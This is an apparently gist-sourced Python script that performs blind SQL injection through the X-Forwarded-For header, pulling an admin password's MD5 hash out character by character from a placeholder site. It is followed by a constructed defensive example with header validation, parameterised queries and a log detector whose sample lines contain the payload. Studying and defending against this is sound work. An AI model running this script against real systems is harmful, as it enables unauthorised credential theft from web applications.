@Techbrunch
Created April 20, 2015 19:48
Blind SQL injection via an HTTP header - http://aloisthevenot.com/blind-sql-injection-via-un-header-http/
# Ported from the original Python 2 gist (httplib/urllib/print statements) to Python 3;
# indentation restored and the garbled urlencpt/urlencptd names fixed to urlencode/urlencoded.
import http.client
import re
import urllib.parse

password = ""
# Hex alphabet of an MD5 digest: each recovered character is one of these 16 symbols.
md5 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
cpt = 0   # index of the candidate character currently being tested
i = 1     # 1-based position in the 32-character hash being recovered

while i <= 32:
    print('Recherche du caractère ' + str(i))
    if cpt == 16:
        cpt = 0  # wrap around and start the alphabet again (the original never gives up)
    print('Test caractere : ' + md5[cpt])
    params = urllib.parse.urlencode({'login': 'admin', 'pwd': 'password'})
    # The boolean condition is injected through X-Forwarded-For, which the server
    # concatenates into its SQL query; '#' comments out the rest of the statement (MySQL).
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "text/plain",
               "x-forwarded-for": "127.0.0.1' or ascii(substring(pwd," + str(i) + ",1))=" + str(ord(md5[cpt])) + "#"}
    conn = http.client.HTTPConnection("www.site.com:80")
    conn.request("POST", "/index.php", params, headers)
    response = conn.getresponse()
    print(response.status, response.reason)
    data = response.read().decode('utf-8', 'replace')  # bytes in Python 3; decode before regex search
    conn.close()
    # Oracle: the page says 'incorrect' only when the injected condition is false.
    if not re.search('incorrect', data):
        print('Caractère trouvé : ' + md5[cpt])
        password += md5[cpt]
        i += 1
        cpt = 0
    else:
        cpt += 1

print('MD5 = ' + str(password))
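As an added example (not part of the gist or the linked article), here is the server-side counterpart of the bug the script relies on and how to close it, plus a small log check that surfaces the attack. The schema, the `users` rows, the function names (`parse_client_ip`, `check_login`, `suspicious_xff_entries`) and the access-log lines are all constructed for this example. The X-Forwarded-For value is validated as an IP address with the standard `ipaddress` module and then bound as a query parameter, so it can never become part of the SQL text; a header that is not an IP is refused before any query runs. The detector scans a constructed log format that records the forwarded header in the last quoted field and flags every request whose forwarded value is not an IP address, which is exactly what the gist's payload looks like in a log.

```python
import hashlib
import ipaddress
import re
import sqlite3

# Added example; everything below is constructed and is not the gist's code.


def parse_client_ip(xff_value):
    """Return the first hop of an X-Forwarded-For header as a normalised IP string,
    or None when that hop is not a syntactically valid IPv4/IPv6 address."""
    if not xff_value:
        return None
    first_hop = xff_value.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        return None


def build_demo_db():
    """In-memory stand-in for the login table (constructed data). The pwd column holds
    an MD5 hex digest, mirroring the gist's assumption about the target application."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, pwd TEXT, last_ip TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", hashlib.md5(b"password").hexdigest(), "10.0.0.5"))
    return db


def check_login(db, login, pwd, xff_value):
    """Hardened login check: refuse malformed forwarded headers and bind every value
    as a query parameter instead of concatenating it into the SQL string."""
    ip = parse_client_ip(xff_value)
    if ip is None:
        return "malformed-header"
    digest = hashlib.md5(pwd.encode("utf-8")).hexdigest()
    row = db.execute(
        "SELECT count(*) FROM users WHERE login = ? AND pwd = ? AND last_ip = ?",
        (login, digest, ip),
    ).fetchone()
    return "ok" if row[0] else "incorrect"


# Detection side: a constructed combined-log variant with the X-Forwarded-For value
# appended as the last quoted field ("-" when the header was absent).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \d+ "([^"]*)"$')

SAMPLE_LOG = [
    '203.0.113.7 - - [20/Apr/2015:19:48:01 +0000] "POST /index.php HTTP/1.1" 200 512 "127.0.0.1"',
    '203.0.113.7 - - [20/Apr/2015:19:48:02 +0000] "POST /index.php HTTP/1.1" 200 512 "127.0.0.1\' or ascii(substring(pwd,1,1))=48#"',
    '198.51.100.4 - - [20/Apr/2015:19:48:03 +0000] "GET / HTTP/1.1" 200 1024 "-"',
]


def suspicious_xff_entries(log_lines):
    """Return (remote_addr, xff_value) for every line whose forwarded value is present
    but is not a valid IP address; a burst of these from one remote_addr is the
    signature of the character-by-character probing the gist performs."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        remote, _request, _status, xff = m.groups()
        if xff != "-" and parse_client_ip(xff) is None:
            hits.append((remote, xff))
    return hits


if __name__ == "__main__":
    db = build_demo_db()
    print(check_login(db, "admin", "password", "10.0.0.5"))
    print(check_login(db, "admin", "password", "127.0.0.1' or 1=1#"))
    for remote, xff in suspicious_xff_entries(SAMPLE_LOG):
        print("suspicious X-Forwarded-For from %s: %r" % (remote, xff))
```

Validating the header and using bound parameters are independent defences: the parameter binding alone already stops the injection, and the IP check additionally keeps junk out of the `last_ip` column and gives the application a clean point at which to log and reject the request.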